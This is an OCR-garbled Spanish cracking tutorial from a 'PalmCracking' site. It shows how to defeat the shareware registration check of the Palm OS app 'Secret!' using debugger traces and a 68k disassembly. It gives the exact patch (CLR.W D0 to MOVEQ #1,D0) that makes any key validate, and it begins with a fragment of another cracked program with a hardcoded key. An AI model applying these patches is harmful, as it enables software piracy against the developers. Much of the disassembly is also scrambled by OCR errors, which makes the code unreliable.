00003340h: 
000035b0h: 
0000353c0h: 
000035d0h: 


49 6E 69 74 00 94 47 72 61 63 69 61 73 20 70 6F ; Init. "Gracias po 
7220 63 6F 6D 70 72 61 72 20 65 73 74 65 20 20 ; r comprar este 
20 20 20 00 73 6F 66 74 77 61 72 65 2E 20 41 68 ; .software. Ah 

6F 72 61 2072 65 67 69 73 74 72 65 20 63 6F 6É ; ora registre con 
3A 20 20 20 00 00 53 75 20 63 6C 61 76 65 2020 ; : ..Su clave 

20 63 6F 6D 7072 61 64 61 20 20 2E 00 00 4B 65 ; comprada ...Ke 
79 3A 20 20 32 36 30 32 36 35 36 34 31 362020 ; y: 2602656416 
56 69 73 69 74 65 6E 6F 73 20 6C 61 20 57 65 62 ; Visitenos la Web 
2E 00 56 69 73 69 7420 77 77 77 2E 61 72 63 6F ; ..Visit www.arco 


Esto Para que cada que lo instalemos no tengamos que recordar el serial 


Lo ideal seria parchar la rutina donde se compara el serial(Sera un tema que es sencillo y les toca averiguarlo). 

Y parece que esta clave funciona en cualquier palm, Cargamos la aplicación en una palm real en mi caso una Palm One 
LifeDrive de 4GB de Disco Duro que supuso todos mis ahorros que compre en WalMart y parece que todo funciona a la 
perfección, Basura de programa que ya estoy por desinstalarlo. 


Con esto hemos echo un crack limpio que verdaderamente cumple con nuestra filosofía PalmCracking 
Asta la próxima. 


Palm Spanish Tutor: Página dedicada a la divulgación de información en Castellano, sobre Ingeniería 


Inversa y Programación en Palm. E-mail "Colabora con tus Proyectos" 


Palm Spanish Tutor 


()Serial (X)HotSync/Code (X)Trial ()Multiprotección ()Encriptado ()Otro 
Encripta texto a 128 Bits - Trial (Violar la rutina de 128 bit's) 


()NewBies (X)Intermedio ()Avanzado ()Master ( )Gúru 
SouthDebugger, PRCedit, PilotDis. Palm Real ó Pose emulador, UltraEdit-32, PalmDemon 0.27 ,PalmDebugger 


SkyNet | FECHA: V/16/Sep/2005 


INTRODUCCION 


Introducción de datos. 


Please Enter Password 


Se nos pide una password para proteger nuestros datos cada que cargemos este programa. 


AL ATAQUE 
Paso 0.- Veremos 


Buscar el titulo de la TAlt de registro que dice "Registration" 


Registration 


Secret! is shareware and must 
be registered for US$ 19 at 


www.linkesoft.com 


Please provide your name as 
displayed below when registering. 


Name: Compag 
Key : 1234567890 


O] Ca] | 


Si la clave introducida fué incorrecta nos aparecera 


Wrong registration key 


The key is not correct. 
Please check if your 
palm user name shown 
on this form is the 
same your gave us for 


generating the key. 


Cargando del Palmdebugger Veremos: 


Initializing parser... 
Initializing lex... 
Installing keywords... 
Initializing eval... 
Initializing exec... 
Loading startup script... 


DebOut = false 
SymbolsOn = true 
StepRegs = false 
ReadMemHack = false 
Attached = false 

dot address = 00000000 
last address = 00000000 
last count = 00000000 


att 

EXCEPTION ID = $80 

'"TargetCfgRoutines' 

+S00FO 1018871C *LINK A6,$0000 | 4E56 0000 
atb "frmalert" 

A-trap set on 0192 (frmalert) 

g 

EXCEPTION ID = $80 


00073DF4 *_FrmAlert ; $10069070 | 4E4F A192 
11 
00073DF4 *_FrmAlert ; $10069070 | 4E4F A192 
00073DF8 MOVEQ.L +$$01,D0O | 7001 

00073DFA BRA.W *+$002C ; 00073E26 | 6000 002A 
00073DFE MOVE.L D3,-$0044(A5) | 2B43 FFBC 
00073E02 MOVE.W 4$235E,-(A7) ¿ '"4" | 3F3C 235 
00073E06 _FrmAlert ; $10069070 | 4E4F A192 
00073E0A BSR.W *-$2EA2 ; 00070F68 | 6100 D15C 
00073E0E MOVEQ.L +$$01,DO | 7001 
00073E10 BRA.W *+$0016 ; 00073E26 | 6000 0014 
00073E14 CMPI.W +$0015, (A0) ; '..' | 0C50 0015 
00073E18 BNE.W *-$0088 ; 00073D90 | 6600 FF76 


El 


00073E1C MOVE.L A0,-(A7) | 2F08 

00073E1E BSR.W *-$080A ; 00073614 | 6100 F7F4 
00073E22 ANDI.W +SO0FF,DO ; '..' | 0240 OOFEF 
00073E26 MOVE.L -$0004(A6),D3 | 262E FFFC 


00073E2A UNLK A6 | 4E5E 
00073E2C RTS | 4E75 
00073E2E LINK A6,$0000 | 4E56 0000 
0007332 MOVE.L A2,-(A7) | 2F0A 

0007334 SUB.L A1,A1 | 93C9 

00073E36 MOVE.L $0008(A6),A2 | 246E 0008 


00073E3A TST.B (A2) | 4A12 

00073E3C BEQ.S *+$001A ; 00073E56 | 6718 
00073E3E MOVE.L A1,DO | 2009 

00073E40 LSL.L 4$03,D0 | E788 

0007342 LEA $00(A1,D0.L),A0 | 41F1 0800 
0007346 LEA -$30(A0,A1.L),A0 | 41F0 98D0 
00073E4A MOVE.B (A2)+,DO0 | 101A 

00073E4C EXT.wW DO | 4880 

00073E4E LEA $00(A0,DO.W),A1l | 43F0 0000 


Paso 1.- Rastreamos los registros y encontramos: 


Del código muerto veremos el siguiente fragmento de código cercano a las ventanas de registro valido e invalido: 


00004ACE 3F 3C 23 32 MOVE.W +$2332, -(A7) 
00004AD2 2F 03 MOVE.L D3, -(A7) 
00004AD4 4E 4F Al 80 SysTrap FrmGetObjectIndex 


00004AD8 3F 00 MOVE.W DO, -(A7) 

00004ADA 2F 03 MOVE.L D3, -(A7) 

00004ADC 4E 4F Al 79 SysTrap FrmSetFocus 
loc_4AEO0: 


00004AEO 42 40 CLR.W DO 

00004AE2 60 00 00 92 BRA LOC_4B76 
loc_4AE6: 
00004AE6 OC 40 
00004AEA 67 F4 
00004AEC 0C 40 00 09 CMP.W *+$0009, DO 
00004AFO 66 72 BNE.S LOC_4B64 


00 1C CMP.W +$001C, DO 
B 
0 
B 
00004AF2 30 28 00 08 MOVE.W $8(A0), DO 
07 
B 
1 
B 


EQO.S LOC_4AE0 


00004AF6 0C 40 E4 CMP.W +$07E4, DO 
00004AFA 67 OA BEQ.S LOC_4B06 
00004AFC 0C 40 13 8D CMP.W +$138D, DO 
00004B00 67 58 BEQ.S LOC_4B5A 
00004B02 60 00 00 60 BRA LOC_4B64 
loc_4B06: 
00004B06 4E 4F Al 73 SysTrap FrmGetActiveForm 
00004BOA 26 08 MOVE.L AO, D3 
00004B0OC 3F 3C 23 32 MOVE.W +4$2332, -(A7) 
00004B10 2F 03 MOVE.L D3, -(A7) 
00004B12 4E 4F Al 80 SysTrap FrmGetObjectIndex 
00004B16 3F 00 MOVE.W DO, -(A7) 
00004B18 2F 03 MOVE.L D3, -(A7) 
00004B1A 4E 4F Al 83 SysTrap FrmGetObjectPtr 

2 

4 

2 


00004B1E 2F 08 MOVE.L AO, -(A7) 

00004B20 4E 4F Al 39 SysTrap FldGetTextPtr 

00004B24 20 08 MOVE.L AO, DO 

00004B26 4F EF 00 10 LEA.L $10(A7), A7 

00004B2A 67 14 BEQ.S LOC_4B40 

00004B2C 2F 00 MOVE.L DO, -—(A7) 

00004B2E 61 00 00 4E BSR.W SUBROUTINE_4BAA <--- Posible chequeo de rutina serial 
00004B32 26 00 MOVE.L DO, D3 

00004B34 2F 03 MOVE.L D3, -(A7) 

00004B36 61 00 00 78 BSR.W SUBROUTINE_4C88 <--- Posible chequeo de rutina serial 
00004B3A 50 8F ADD.L +$8, A7 
00004B3C 4A 40 TST.W DO 
00004B3E 66 OE BNE.S LOC_4B4E 
loc_4B40: 


00004B40 3F 3C 23 5C MOVE.w 4$235C, -(A7) 


Wrong registration key 


The key is not correct. 
Please check if your 
palm user name shown 
on this form is the 
same your gave us for 


generating the key. 


X-—ref to Alert (Wrong registration key) <--—- Registro invalido 


00004B44 4E 4F Al 92 SysTrap FrmAlert 
00004B48 70 01 MOVE.L +$1, DO 
00004B4A 60 00 00 2A BRA LOC_4B76 
loc_4B4E: 

00004B4E 2B 43 FF BC MOVE.L D3, VAR_44 


00004B52 3F 3C 23 5E MOVE .W 15235E, -(A7) <--- Usuario registrado 


Thank You 
Thank you for 
registering Secret! 
Your registration 
number will be valid for 


all future upgrades of 
secret!. 


X-ref to Alert (Thank you) 


00004B56 4E 4F Al 92 SysTrap FrmAlert 
loc_4B5A: 

00004B5A 61 00 D1 5C BSR.W LOC_1CB8 
00004B5E 70 01 MOVE.L $1, DO 
00004B60 60 00 00 14 BRA LOC_4B76 
loc_4B64: 
00004B64 0C 50 00 15 CMP.W +$0015, (AO) 
00004B68 66 00 FF 76 BNE LOC_4AE0O 

00004B6C 2F 08 MOVE.L AO, -(A7) 

00004B6E 61 00 F7 F4 BSR.W SUBROUTINE_43DC 
00004B72 02 40 00 FF AND.W *+SO0O0FF, DO 
loc_4B76: 

00004B76 26 2E FF FC MOVE.L -$4(A6), D3 
00004B7A 4E 5E UNLK.L A6 

00004B7C 4E 75 RTS 


A FUNCTION SubRoutine_4BAA () 


SubRoutine_4BAA: 

00004B7E 4E 56 00 00 LINK.L A6, +0 
00004B82 2F 0A MOVE.L A2, -(A7) 
00004B84 93 C9 SUBA.L Al, Al 


00004B86 24 6E 00 08 MOVE.L $8(A6), A2 
00004B8A 4A 12 TST.B (A2) 

00004B8C 67 18 BEQ.S LOC_4BA6 

loc_4B8E: 

00004B8E 20 09 MOVE.L Al, DO 

00004B90 E7 88 LSL.L $$$3, DO 

00004B92 41 F1 08 00 LEA.L $0(Al, DO.W), AO 
00004B96 41 FO 98 DO LEA.L $DO(A0O, D1.W), AO 
00004B9A 10 1A MOVE.B (A2)+, DO 

00004B9C 48 80 
00004B9E 43 FO 00 00 LEA.L $0O(AO0, DO.W), Al 
00004BA2 4A 12 TST.B (A2) 

00004BA4 66 E8 BNE.S LOC_4B8E 

loc_4BA6: 

00004BA6 20 09 MOVE.L Al, DO 

00004BA8 24 5F MOVE.L (A7)+, A2 

00004BAA 4E 5E UNLK.L A6 

00004BAC 4E 75 RIS 

00004BAE 00 00 or.b *$0, dO0 


jp Hass FUNCTION SubRoutine_4C88() 

, 

¿ local struct sVar_02 = -$2(a6) 

¿ local struct sVar_2E = -$2E(a6) 

SubRoutine_4C88: <--—- Rutina de comprobación de registro valido ó invalido 


00004BBO 4E 56 FF DO LINK.L A6, +t-$30 

00004BB4 48 E7 

00004BB6 1F 38 28 6E MOVE.B $286E, -(A7) 

00004BBA 00 08 OR.B +$8, AO 

00004BBC 3F 3C 03 FO MOVE.W +$03F0, -—(A7) <--—- titulo "Secret!" 
00004BCO 2F 3C 74 53 54.. MOVE.L 14574535452, -(A7) : -> 'tSTR' 
00004BC6 4E 4F AO 5F SysTrap DmGetResource 

00004BCA 2C 08 MOVE.L AO, D6 

00004BCC 3F 3C 03 F1 MOVE.W +$03F1, -(A7) 

00004BDO 2F 3C 74 53 54.. MOVE.L 4574535452, -(A7) : -> 'tSTR' 
00004BD6 4E 4F AO 5F SysTrap DmGetResource 

00004BDA 2E 08 MOVE.L AO, D7 

00004BDC 2F 06 MOVE.L D6, -(A7) 

00004BDE 4E 4F AO 21 SysTrap MemHandleLock 

00004BE2 2D 48 FF D2 MOVE.L AO, SVAR_2E 

00004BE6 2F 07 MOVE.L D7, -(A7) 
00004BE8 4E 4F AO 21 SysTrap MemHandleLock 
00004BEC 26 48 MOVE.L AO, A3 

00004BEE 42 45 CLR.W D5 

00004BFO0O 4F EF 00 14 LEA.L $14(A7), A7 
00004BF4 B8 FC 00 00 CMPA.W *+$0000, AZ 
00004BF8 67 6É BEQ.S LOC_4C68 

00004BFA 42 A7 CLR.L -(A7) 

00004BFC 42 A7 CLR.L -(A7) 

00004BFE 78 D6 MOVE.L $f$DG6, D4 

00004C00 D8 8E ADD.L A6, D4 

00004C02 2F 04 MOVE.L D4, -(A7) 


00004C04 42 A7 CLR.L -(A7) 
00004C06 42 A7 CLR.L -(A7) 
00004C08 42 A7 CLR.L -(A7) 
00004C0A 4E 4F A2 A9 SysTrap DlkGetSyncInfo <--- Lee Nuestro "Hotsync Name" 


00004C0E 42 2E FF FE CLR.B SVAR_02 
00004C12 2F 0C MOVE.L AZ, -(A7) 
00004C14 2F 0B MOVE.L A3, -(A7) 


00004C16 2F 2E FF D2 MOVE.L SVAR_2E, -(A7) 
00004C1A 2F 04 MOVE.L D4, -(A7) 

00004C1C 45 FA 02 50 LEA.L $250(PC), A2 
00004C20 4E 92 JSR.L (A2) 
00004C22 3A 00 MOVE.W DO, D5 

00004C24 4F EF 00 28 LEA.L $28(A7), A7 

00004C28 66 3E BNE.S LOC_4C68 

00004C2A 3F 3C 03 EF MOVE.W *+$S03EEF, -(A7) <----— frase "Xozirwvm" 
00004C2E 2F 3C 74 53 54.. MOVE.L 4574535452, -(A7) : -> 'tSTR' 
00004C34 4E 4F AO 5F SysTrap DmGetResource 

00004C38 26 08 MOVE.L AO, D3 

00004C3A 2F 03 MOVE.L D3, -(A7) 

00004C3C 4E 4F AO 21 SysTrap MemHandleLock 

00004C40 2F 04 MOVE.L D4, -(A7) 

00004C42 2F 08 MOVE.L AO, -(A7) 

00004C44 61 00 01 DE BSR.W SUBROUTINE_4E6A 

00004C48 2F 0C MOVE.L Al, -(A7) 

00004C4A 2F OB MOVE.L A3, -(A7) 

00004C4C 2F 2E FF D2 MOVE.L SVAR_2E, -(A7) 

00004C50 2F 04 MOVE.L D4, -(A7) 

00004C52 4E 92 JSR.L (A2) 

00004C54 3A 00 MOVE.W DO, D5 

00004C56 4F EF 00 1E LEA.L S1E(A7), A7 

00004C5A 2E 83 MOVE.L D3, (A7) 

00004C5C 4E 4F A0 22 SysTrap MemHandleUnlock 

00004C60 2F 03 MOVE.L D3, -(A7) 

00004C62 4E 4F AO 61 SysTrap DmReleaseResource 

00004C66 50 8F ADD.L +$8, A7 

loc_4C68: 

00004C68 2F 06 MOVE.L D6, -(A7) 

00004C6A 4E 4F AO 22 SysTrap MemHandleUnlock 

00004C6E 2F 06 MOVE.L D6, -(A7) 

00004C70 4E 4F AO 61 SysTrap DmReleaseResource 

00004C74 2F 07 MOVE.L D7, -(A7) 

00004C76 4E 4F AO 22 SysTrap MemHandleUnlock 

00004C7A 2F 07 MOVE.L D7, -(A7) 

00004C7C 4E 4F AO 61 SysTrap DmReleaseResource 

00004C80 30 05 MOVE.W D5, DO 

00004C82 4C EE 
00004C84 1C F8 FF BO MOVE.B SFFBO, (A6)+ 
00004C88 4E 5E UNLK.L A6 


00004C8A 4E 75 RTS <-—-—- Termina rutina de comprobación regresa 
RAS FUNCTION notset () 

, 

notset: 


00004C8C 4E 56 00 00 LINK.L A6, +0 

00004C90 2F 0A MOVE.L A2, -(A7) 

00004C92 2F 03 MOVE.L D3, -(A7) 

00004C94 3F 3C 23 FO MOVE.W +$23F0, -—(A7) <-—-—- Pondra un letrero que diga "Registered for" 
00004C98 2F 3C 74 53 54.. MOVE.L $$874535452, -(A7) : -> 'tSTR' 
00004C9E 4E 4F AO 5F SysTrap DmGetResource 

00004CA2 26 08 MOVE.L AO, D3 

00004CA4 2F 03 MOVE.L D3, -(A7) 

00004CA6 4E 4F AO 21 SysTrap MemHandleLock 

00004CAA 2F 08 MOVE.L AO, -(A7) 

00004CAC 45 ED FE 74 LEA.L VAR_18C, A2 

00004CBO 2F 0A MOVE.L A2, -(A7) 


00004CB2 4E 4F AO C5 SysTrap StrCopy 
00004CB6 2F 03 MOVE.L D3, -(A7) 

00004CB8 4E 4F A0 22 SysTrap MemHandleUnlock 
00004CBC 20 4A MOVE.L A2, AO 

00004CBE 26 2E FF F8 MOVE.L -$8(A6), D3 
00004CC2 24 6É FF FC MOVE.L -$4(A6), A2 
00004CC6 4E 5E UNLK.L A6 

00004CC8 4E 75 RTS 

00004CCA 28 6É 6F 74 move.l $6F74(a6), al 
00004CCE 20 73 65 74 move.1l $74(a3, d6.w), a0 
00004CD2 29 00 move.l1 d0, - (al) 


A FUNCTION SubRoutine_4D12() 


SubRoutine_4D12: 

00004CD4 4E 56 00 00 LINK.L A6, +0 
00004CD8 2F 0A MOVE.L A2, -(A7) 
00004CDA 42 A7 CLR.L -(A7) 
00004CDC 42 A7 CLR.L -(A7) 
00004CDE 45 ED FE 94 LEA.L VAR_16C, A2 
00004CE2 2F 0A MOVE.L A2, -(A7) 
C 
C 
6 


00004CE4 42 A7 R.L -(A7) 

00004CE6 42 A7 R.L -(A7) 

00004CE8 42 A7 R.L -(A7) 

00004CEA 4E 4F A2 A9 SysTrap Dl1kGetSyncInfo 
00004CEE 42 2A 00 28 CLR.B $28(A2) 

00004CF2 2F OA MOVE.L A2, -(A7) 

00004CF4 4E 4F AO C7 SysTrap Strlen 
00004CF8 4F EF 00 1C LEA.L $1C(A7), A7 
00004CFC 4A 40 TST.W DO 
00004CFE 66 0C BNE.S LOC_4D0C 

00004D00 41 FA FF C8 LEA.L -$38(PC), AO 
00004D04 2F 08 MOVE.L AO, -(A7) 
00004D06 2F 0A MOVE.L A2, -(A7) 
00004D08 4E 4F AO C5 SysTrap StrCopy 
loc_4DO0C: 
00004D0C 20 4A MOVE.L A2, AO 

00004DOE 24 6E FF FC MOVE.L -$4(A6), A2 
00004D12 4E 5E UNLK.L A6 

00004D14 4E 75 RTS 


o FUNCTION SubRoutine_4E20() 
, 

; local struct sVar_02 = -$2(a6) 

; local struct sVar_2E = -$2E(a6) 

; local long lVar_32 = -$32(a6) 


SubRoutine_4E20: 

00004D16 4E 56 FF CC LINK.L A6, *$+-$34 
00004D1A 48 E7 

00004D1C 1F 38 28 6E MOVE.B $286E, -(A7) 
00004D20 00 08 OR.B +$8, AO 

00004D22 42 AE FF D2 CLR.L SVAR_2E 
00004D26 B8 FC 00 00 CMPA.W +$0000, A4 
00004D2A 66 06 BNE.S LOC_4D32 

00004D2C 91 C8 SUBA.L AO, AO 

00004D2E 60 00 00 EA BRA LOC_4E1A 
loc_4D32: 

00004D32 3F 3C 03 FO MOVE.W *+$03F0, -(A7) <--- titulo "Secret!" 


00004D36 2F 3C 74 53 54.. MOVE.L 14574535452, -(A7) : -> 'tSTR' 
00004D3C 4E 4F AO 5F SysTrap DmGetResource 

00004D40 2C 08 MOVE.L AO, D6 

00004D42 3F 3C 03 F1 MOVE.W +$03F1, -(A7) 

00004D46 2F 3C 74 53 54.. MOVE.L 14574535452, -(A7) : -> 'tSTR' 
00004D4C 4E 4F AO 5F SysTrap DmGetResource 

00004D50 2E 08 MOVE.L AO, D7 

00004D52 2F 06 MOVE.L D6, -(A7) 

00004D54 4E 4F AO 21 SysTrap MemHandleLock 

00004D58 2D 48 FF CE MOVE.L AO, LVAR_32 

00004D5C 2F 07 MOVE.L D7, -(A7) 
00004D5E 4E 4F AO 21 SysTrap MemHandleLock 
00004D62 26 48 MOVE.L AO, A3 

00004D64 42 A7 CLR.L -(A7) 

00004D66 42 A7 CLR.L -(A7) 

00004D68 7A D6 MOVE.L +$D6, D5 

00004D6A DA 8E ADD.L A6, D5 

00004D6C 2F 05 MOVE.L D5, -(A7) 

00004D6E 42 A7 CLR.L -(A7) 

00004D70 42 A7 CLR.L -(A7) 

00004D72 42 A7 CLR.L -(A7) 

00004D74 4E 4F A2 A9 SysTrap DlkGetSyncInfo 


00004D78 42 2E FF FE CLR.B SVAR_02 
00004D7C 4F EF 00 28 LEA.L $28(A7), A7 
00004D80 2E 8C MOVE.L AZ, (A7) 

00004D82 2F 0B MOVE.L A3, -(A7) 

00004D84 2F 2E FF CE MOVE.L LVAR_32, -(A7) 
00004D88 2F 05 MOVE.L D5, -(A7) 

00004D8A 45 FA 00 E2 LEA.L $E2(PC), A2 
00004D8E 4E 92 JSR.L (A2) 
00004D90 38 00 MOVE.W DO, D4 

00004D92 4F EF 00 10 LEA.L $10(A7), A7 

00004D96 66 3E BNE.S LOC_4DD6 

00004D98 3F 3C 03 EF MOVE.W F*$03EEF, -(A7) <---- frase "Xozirwvnm" 
00004D9C 2F 3C 74 53 54.. MOVE.L 4574535452, -(A7) : -> 'tSTR' 
00004DA2 4E 4F AO 5F SysTrap DmGetResource 

00004DA6 26 08 MOVE.L AO, D3 

00004DA8 2F 03 MOVE.L D3, -(A7) 

00004DAA 4E 4F AO 21 SysTrap MemHandleLock 

00004DAE 2F 05 MOVE.L D5, -(A7) 

00004DBO 2F 08 MOVE.L AO, -(A7) 

00004DB2 61 00 00 70 BSR.W SUBROUTINE_4E6A 

00004DB6 2F 0C MOVE.L AZ, -(A7) 

00004DB8 2F 0B MOVE.L A3, -(A7) 

00004DBA 2F 2E FF CE MOVE.L LVAR_32, -(A7) 

00004DBE 2F 05 MOVE.L D5, -(A7) 

00004DC0 4E 92 JSR.L (A2) 

00004DC2 38 00 MOVE.W DO, D4 

00004DC4 4F EF 00 1E LEA.L S1E(A7), A7 

00004DC8 2E 83 MOVE.L D3, (A7) 

00004DCA 4E 4F AO 22 SysTrap MemHandleUnlock 

00004DCE 2F 03 MOVE.L D3, -(A7) 

00004DDO 4E 4F AO 61 SysTrap DmReleaseResource 

00004DD4 50 8F ADD.L +$8, A7 

loc_4DD6: 

00004DD6 2F 06 MOVE.L D6, -(A7) 

00004DD8 4E 4F A0 22 SysTrap MemHandleUnlock 

00004DDC 2F 06 MOVE.L D6, -(A7) 

00004DDE 4E 4F AO 61 SysTrap DmReleaseResource 


00004DE2 2F 07 MOVE.L D7, -(A7) 

00004DE4 4E 4F A0 22 SysTrap MemHandleUnlock 
00004DE8 2F 07 MOVE.L D7, -(A7) 

00004DEA 4E 4F AO 61 SysTrap DmReleaseResource 
00004DEE 4F EF 00 10 LEA.L $10(A7), A7 
00004DF2 4A 44 TST.W D4 

00004DF4 67 20 BEQO.S LOC_4E16 

00004DF6 2F 05 MOVE.L D5, -(A7) 

00004DF8 4E 4F AO C7 SysTrap Strlen 

00004DFC 52 40 ADD.W +$1, DO 

00004DFE 30 40 MOVE.W DO, AO 

00004E00 2F 08 MOVE.L AO, -(A7) 

00004E02 4E 4F AO 13 SysTrap MemPtrNew 
00004E06 2D 48 FF D2 MOVE.L AO, SVAR_2E 
00004E0A 50 8F ADD.L +$8, A7 

00004E0C 67 08 BEQ.S LOC_4E16 

00004E0E 2F 05 MOVE.L D5, -(A7) 

00004E10 2F 08 MOVE.L AO, -(A7) 

00004E12 4E 4F AO C5 SysTrap StrCopy 


2 
loc_4E16: 
00004E16 20 6ÉE FF D2 MOVE.L SVAR_2E, AO 
loc_4E1A: 
00004E1lA 4C EE 

00004E1C 1C F8 FF AC MOVE.B $SFEAC, (A6)+ 
00004E20 4E 5E UNLK.L A6 


00004E22 4E 75 RTS 


Po ia FUNCTION SubRoutine_4E6A() 


SubRoutine_4E6A: 

00004E24 4E 56 00 00 LINK.L A6, +0 
00004E28 22 6E 00 08 MOVE.L $8(A6), Al 
00004E2C 20 6E 00 0C MOVE.L $C(A6), AO 
00004E30 4A 11 TST.B (Al) 

00004E32 67 34 BEQ.S LOC_4E68 
loc_4E34: 

00004E34 12 11 MOVE.B (Al), D1 
00004E36 10 01 MOVE.B D1, DO 

00004E38 06 00 ADD.B $0, DO 

00004E3A FF 9F DC.W FEE9F 

00004E3C 0C 00 CMP.B $0, DO 

00004E3E 00 19 OR.B +$19, (Al1)+ 
00004E40 62 06 BHI.S LOC_4E48 

00004E42 70 DB MOVE.L *SDB, DO 
00004E44 60 00 00 10 BRA LOC_4E56 
loc_4E48: 

00004E48 10 01 MOVE.B D1, DO 

00004E4A 06 00 ADD.B *$0, DO 

00004E4C FF BF DC.W FEEBF 

00004E4E 0C 00 CMP.B $0, DO 

00004E50 00 19 OR.B +$19, (Al1)+ 
00004E52 62 OA BHI.S LOC_4E5E 

00004E54 70 9B MOVE.L $f$9B, DO 
loc_4E56: 
00004E56 90 01 SUB.B D1, DO 
00004E58 10 80 MOVE.B DO, (AO) 
00004E5A 60 00 00 04 BRA LOC_4E60 
loc_4E5E: 
00004E5E 10 81 MOVE.B D1, (A0) 


loc_4E60: 


00004E60 
00004E62 
00004E64 
00004E66 


loc_4E68: 


00004E68 
00004E6A 


89 
88 
11 
¡ee 


10 
SE 


ADD.L 
ADD.L 
TST.B 
BNE.S 


CLR.B 


$1, 
$1, 
(a1) 


LOC_ 


(A0) 


UNLK.L A6 


00004E6C 


ess) 


RTS 


Al 
AO 


4E34 


FUNCTION SubRoutine_4F08() 


SubRoutine_4FO08: 
00 00 LINK.L A6, +0 


00004E6E 
00004E72 
00004E74 
00004E76 
00004E7A 
00004E7E 
00004E82 
00004E84 
00004E88 
00004E8A 
00004E8C 
00004E90 
00004E92 
00004E94 
00004E98 
00004E9A 
00004E9C 
00004E9E 
00004EAO 
00004EA2 
00004EA6 
00004EA8 
00004EAC 
00004EAE 
00004EBO 


loc_4EB4: 


00004EB4 
00004EB6 
00004EB8 
00004EBC 
00004EBE 
00004EC0 
00004EC4 
00004EC6 
00004EC8 
00004ECC 
00004ECE 
00004ED2 
00004ED4 
00004ED8 
00004EDA 
00004EDE 
00004EE0 
00004EE4 
00004EE8 
00004EEA 


4E 
48 
1F 
2C 
2E 
2A 
2F 
4E 
36 
2F 
4E 
38 
2F 
4E 
D6 
D6 
52 
30 
2F 
4E 
28 
4F 
66 
42 
60 


2F 
2F 
4É 
2F 
2F 
4É 
2F 
2F 
4É 
2F 
61 
2F 
61 
26 
4F 
2E 
2F 
61 
50 
BO 


56 
E7 
00 
2E 
2E 
2E 
06 
4F 
00 
07 
4F 
00 
05 
4F 
44 
40 
43 
43 
08 
4F 
08 
EF 
06 
40 
00 


06 
04 
4F 
07 
04 
4F 
05 
04 
4F 
04 
00 
04 
00 
00 
EF 
85 
2E 
00 
8rF 
83 


MOVE.B DO, 
00 08 MOVE.L $8(A6), D6 
00 0C MOVE.L $C(A6), D7 
00 10 MOVE.L $10(A6), D5 


MOVE. 
A0 C7 


MOVE. 
A0 C7 


L DC, 


SysT 


MOVE .W DO, 
Ly DT"; 


SysT 


MOVE .W DO, 


MOVE . 
A0 C7 
ADD.W 
ADD.W 
ADD.W 


EDO, 


SysT 
D4, 
DO, 
$*$l, 


-(A7) 


-(A7) 

rap StrLen 
D3 
=(A7) 
rap StrLen 
D4 
=(A7) 
rap StrLen 
D3 

D3 

D3 


MOVE .W D3, AO 


MOVE. 1 
A0 13 


L AO, 
SysT 


MOVE. 1 
00 10 
BNE.S 
CLR.W 
00 50 


MOVE . 
MOVE . 
AO C5 
MOVE . 
MOVE . 
AO C6 
MOVE . 
MOVE . 
A0 C6 
MOVE . 
01 38 
MOVE . 
00 EC 
MOVE . 
00 1c 


L AO, 
EA. 


=(A7) 

rap MemPtrNew 
D4 

, $10(A7), A7 


DO 
BRA 


L D6, 
li D4, 


SysT 


ti D7, 
ti D4, 


SysT 


L D5, 
li D4, 


SysT 


li D4, 


BSR. 


li D4, 


BSR. 


L DO, 


LEA. 


MOVE . 


L Do, 


LOC_ 


4EB4 


LOC_4F02 


=(A7) 
=(A7) 

rap StrCopy 
=(A7) 
=(A7) 

rap StrCat 
=(A7) 
=(A7) 

rap StrCat 

=(A7) 

W SUBROUTINE_508E 
=(A7) 

W SUBROUTINE_5004 
D3 

L $1C(A7), A7 
(A7) 


00 14 MOVE.L $14(A6), -(A7) 
00 9C BSR.W SUBROUTINE_4FBO0 


ADD.L 
CMP.L 


+58, 
D3, 


A7 
DO 


00004EEC 67 0C BEQ.S LOC_4EFA 
00004EEE 2F 04 MOVE.L D4, -(A7) 
00004EFO 4E 4F AO 12 SysTrap MemChunkFree 


00004EF4 42 40 CLR.W DO <--- Cambiar a MoveQ ¿1,DO (7001 Hexa) 


Es la solución para hacer que 

se valide cualquier tipo de registro por 
incorrecto que sea, al cambiar esta 
funcion podremos decir el porque se 

nos envia a esta parte ,pues porque 
justamente arriba vemos la funcion 

API "SysTrap MemChunkFree" que retiene 

en la memoria el registro 

valido y este se guarda cada que 

cargemos el registro, curiosamente 

esta funcion se utiliza en todas las 
aplicaciones de est compalia pues e visto 
que por ejemplo en otra aplicacién llamada 
LClock v1.0 se £tiliza esta misma 
instruccién, quizas est información 

la utilicen otros programas de otras 
compañias , por lo que no dudemos en buscar 
una API "MemChunkFree" y justamente 

abajo tratemos de encontrar una instrucción 
CLR.W DO 

Aqui vemos como un serial valido se debe 
de estar cargando en la memoria. 


00004EF6 60 00 00 OA BRA LOC_4F02 
loc_4EFA: 

00004EFA 2F 04 MOVE.L D4, -(A7) 
00004EFC 4E 4F AO 12 SysTrap MemChunkFree 
00004F00 70 01 MOVE.L +$1, DO 
loc_4F02: 

00004F02 4C EE 

00004F04 00 F8 DC.W +00F8 
00004F06 FF EC DC.W FFFEC 
00004F08 4E 5E UNLK.L A6 
00004FOA 4E 75 RTS 


Con el código vivo vemos que en el registro (previo al poner un "frmalert") Saltó a la primera y metemos la narices en la KERNEL (memoria 
del Palm Os) 


D3: 499602D2 <--- En decimal es 1234567890 (se guarda el serial falso 1234567890), esto lo vemos en la parte derecha del programa 
palmdebugger (Léase como "CPU REGISTERS"): 


DO: 00000000 

D1: 007F2000 <--- En decimal es 8331264 (No es el serial correcto) 

D2: 00005696 <--- En decimal es 22166 (No es el serial correcto) 

D3: 499602D2 <--- En decimal es 1234567890 (Serial falso que se comparara con otro registro) 
D4: SO7FFEC6 <--- En decimal es 2155871942 (No es el serial correcto) 

D5: 00000000 

D6: 00000000 

D7: 0003DO7E <--- En decimal es 249982 (No es el serial correcto) 


AO: 0003E67C <--- En decimal es 255612 (No es el serial correcto) 
Al: 1018462C <--- En decimal es 270026284 (No es el serial correcto) 
A2: 00073D4C <--- En decimal es 474444 (No es el serial correcto) 
A3: 00004C1C <--- En decimal es 19484 (No es el serial correcto) 
A4: 00070970 <--- En decimal es 461168 (No es el serial correcto) 
AS: 00004BA8 <--- En decimal es 19368 (No es el serial correcto) 
A6: 0003BA94 <--- En decimal es 244372 (No es el serial correcto) 
AT: 0003BA8E <--- En decimal es 244366 (No es el serial correcto) 


Una vez que ya sabemos a donde se guarda nuestro serial falso que es en el registro D3 ahora vasta con ir rastreando todos los registros que 
se comparen con el famoso D3 


